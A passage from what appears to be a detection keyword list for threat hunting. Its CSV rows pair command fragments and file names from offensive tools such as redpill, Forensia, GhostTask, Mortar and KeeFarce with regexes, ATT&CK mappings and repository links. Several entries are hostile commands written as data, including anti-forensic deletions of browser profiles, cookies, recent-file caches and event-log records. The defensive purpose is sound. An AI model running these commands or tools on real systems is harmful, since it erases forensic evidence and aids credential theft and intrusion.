post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - 
T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40702" "*DEL /q /f %windir%\Temp\*.lnk*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Temp\\.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40703" "*DEL /q /f /s %appdata%\Microsoft\Windows\Cookies\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Cookies\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40704" "*DEL /q /f /s %appdata%\Microsoft\Windows\Cookies\*.**",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Cookies\\.{0,1000}\..{0,1000}.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40705" "*DEL /q /f /s %appdata%\Microsoft\Windows\Recent\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Recent\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40706" "*DEL /q /f /s %appdata%\Mozilla\Firefox\Profiles\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Mozilla\\Firefox\\Profiles\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in 
post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40707" "*DEL /q /f /s %userprofile%\*.log*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%userprofile\%\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40708" "*DEL /q /f /s %userprofile%\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%userprofile\%\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40709" "*del C:\\Windows\\AppCompat\\Programs\\RecentFileCache.bcf*",".{0,1000}del\sC\:\\\\Windows\\\\AppCompat\\\\Programs\\\\RecentFileCache\.bcf.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40710" "*del C:\Windows\AppCompat\Programs\RecentFileCache.bcf*",".{0,1000}del\sC\:\\Windows\\AppCompat\\Programs\\RecentFileCache\.bcf.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40711" "*del C:\Windows\AppCompat\Programs\RecentFileCache.bcf*",".{0,1000}del\sC\:\\Windows\\AppCompat\\Programs\\RecentFileCache\.bcf.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40712" "*del Green.vbs*",".{0,1000}del\sGreen\.vbs.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - 
T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","40714" "*del Ps1ToVbs.ps1""*",".{0,1000}del\sPs1ToVbs\.ps1\"".{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","40715" "*deleg_enum_imp*",".{0,1000}deleg_enum_imp.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","40717" "*Delegation/delegation.py*",".{0,1000}Delegation\/delegation\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","40718" "*delegation_constrained_objects.txt*",".{0,1000}delegation_constrained_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - 
TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","40719" "*delegation_constrained_w_protocol_transition_objects.txt*",".{0,1000}delegation_constrained_w_protocol_transition_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","40720" "*delegation_rbcd_objects.txt*",".{0,1000}delegation_rbcd_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","40721" "*delegation_unconstrained_objects.txt*",".{0,1000}delegation_unconstrained_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","40722" "*DelegationBOF.*",".{0,1000}DelegationBOF\..{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","40723" "*DELETE FROM LDAPHUNTERFINDINGS*",".{0,1000}DELETE\sFROM\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","40724" "*Delete specified evt file's eventlog record.You need to set StartTime and EndTime*",".{0,1000}Delete\sspecified\sevt\sfile\'s\seventlog\srecord\.You\sneed\sto\sset\sStartTime\sand\sEndTime.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#content","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","40725" "*Delete specified evt file's eventlog record.You need to set StartTime and EndTime*",".{0,1000}Delete\sspecified\sevt\sfile\'s\seventlog\srecord\.You\sneed\sto\sset\sStartTime\sand\sEndTime.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#content","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","40726" "*Delete the eventlog by rewriting the evtx 
file*",".{0,1000}Delete\sthe\seventlog\sby\srewriting\sthe\sevtx\sfile.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#content","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","40727" "*Delete the eventlog by using WinAPI EvtExportLog*",".{0,1000}Delete\sthe\seventlog\sby\susing\sWinAPI\sEvtExportLog.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#content","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","40728" "*DeleteKey(*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\*",".{0,1000}DeleteKey\(.{0,1000}SOFTWARE\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","#registry","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","40729" "*DeletePSscriptSignning.bat*",".{0,1000}DeletePSscriptSignning\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40730" "*DeleteScheduleTask(LPCSTR computerName*",".{0,1000}DeleteScheduleTask\(LPCSTR\scomputerName.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","40731" "*Deleting RecentFileCache.bcf*",".{0,1000}Deleting\sRecentFileCache\.bcf.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40732" "*deliver.exe -d -c * -f*.enc*",".{0,1000}deliver\.exe\s\-d\s\-c\s.{0,1000}\s\-f.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","40733" "*deliver.exe -d -f *.enc*",".{0,1000}deliver\.exe\s\-d\s\-f\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","40734" "*dementor - rough PoC to connect to spoolss to elicit machine account authentication *",".{0,1000}dementor\s\-\srough\sPoC\sto\sconnect\sto\sspoolss\sto\selicit\smachine\saccount\sauthentication\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","40735" "*dementor.py -d * -u * -p *",".{0,1000}dementor\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","rough PoC to connect to spoolss to elicit machine account authentication","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","40736" "*demo-bof.cna*",".{0,1000}demo\-bof\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","40737" "*demo-client.exe *",".{0,1000}demo\-client\.exe\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","40738" "*demo-controller.exe *",".{0,1000}demo\-controller\.exe\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","40739" "*demonizedshell.sh*",".{0,1000}demonizedshell\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","40740" "*demonizedshell_static.sh*",".{0,1000}demonizedshell_static\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","40741" "*denandz/KeeFarce*",".{0,1000}denandz\/KeeFarce.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","1","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","40742" "*denandz/SecretServerSecretStealer*",".{0,1000}denandz\/SecretServerSecretStealer.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential 
Access","https://github.com/denandz/SecretServerSecretStealer","1","1","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","40743" "*Dendrobate-master*",".{0,1000}Dendrobate\-master.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","40744" "*dendron*FileMonInject.dll*",".{0,1000}dendron.{0,1000}FileMonInject\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","40745" "*DeNiSe-master.zip*",".{0,1000}DeNiSe\-master\.zip.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","N/A","10","10","28","13","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z","40746" "*DeNiSePkg.py*",".{0,1000}DeNiSePkg\.py.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","N/A","10","10","28","13","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z","40747" "*deploycaptureserver.ps1*",".{0,1000}deploycaptureserver\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - 
TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","40748" "*DeployPrinterNightmare*",".{0,1000}DeployPrinterNightmare.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","40749" "*DeployPrinterNightmare.exe*",".{0,1000}DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40750" 